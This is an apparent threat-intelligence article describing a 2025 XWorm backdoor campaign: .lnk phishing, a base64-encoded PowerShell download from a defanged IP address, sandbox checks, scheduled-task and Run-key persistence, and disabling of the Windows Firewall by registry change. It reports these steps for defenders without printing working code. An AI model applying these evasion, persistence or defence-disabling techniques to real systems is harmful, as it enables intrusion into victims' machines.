XWorm Malware: New Infection Chain Bypasses Detection by Exploiting User and System Trust

Emerging quietly in mid-2025, the XWorm backdoor has developed into a highly sophisticated threat that exploits user confidence and system conventions. Initial reports indicated a sudden increase in obscure .lnk-based phishing emails disguised as harmless documents. Security teams quickly discovered that these shortcuts activated hidden PowerShell routines instead of opening the expected files, signalling the emergence of a new infection chain. Within days, organisations across various sectors reported unusual network connections to unfamiliar IP addresses, suggesting the presence of an active Command and Control (C2) infrastructure. As the campaign progressed, Trellix analysts noted a significant shift from XWorm’s earlier, more predictable tactics. The attackers abandoned simplistic batch scripts and obvious VBScript payloads in favour of a multi-stage mechanism that combined social engineering with technical subterfuge. The initial .lnk file, often delivered through targeted spear-phishing, dropped a seemingly benign text artifact before stealthily fetching “discord.exe” from a remote host.

Upon execution, the .NET-based executable unpacks and launches two additional components—main.exe and system32.exe—with the latter acting as the core XWorm payload. Once system32.exe establishes a foothold, it conducts thorough environment checks, aborting if it detects a sandbox or virtual machine. If the host is deemed genuine, the malware replicates itself as Xclient.exe and ensures persistence by creating both a scheduled task and a registry Run key. System defences are systematically dismantled, with Windows Firewall policies disabled through modifications to HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsFirewallDisableFirewall. PowerShell execution policies are also bypassed to whitelist the malicious processes. The heart of XWorm’s new infection chain lies in its clever use of base64 encoding combined with Rijndael decryption, allowing the payload to remain concealed until execution. The initial .lnk file embeds a base64 string that decodes into a one-line PowerShell command, which retrieves “discord.exe” from hxxp://85[.]203[.]4[.]232:5000/Discord.exe, saving it to the Temp directory before launching it discreetly. 

Categories: Malware Evolution, Phishing Techniques, Infection Mechanism 

Tags: XWorm, Backdoor, Phishing, PowerShell, Command and Control, Malware, Persistence, Base64, Decryption, Social Engineering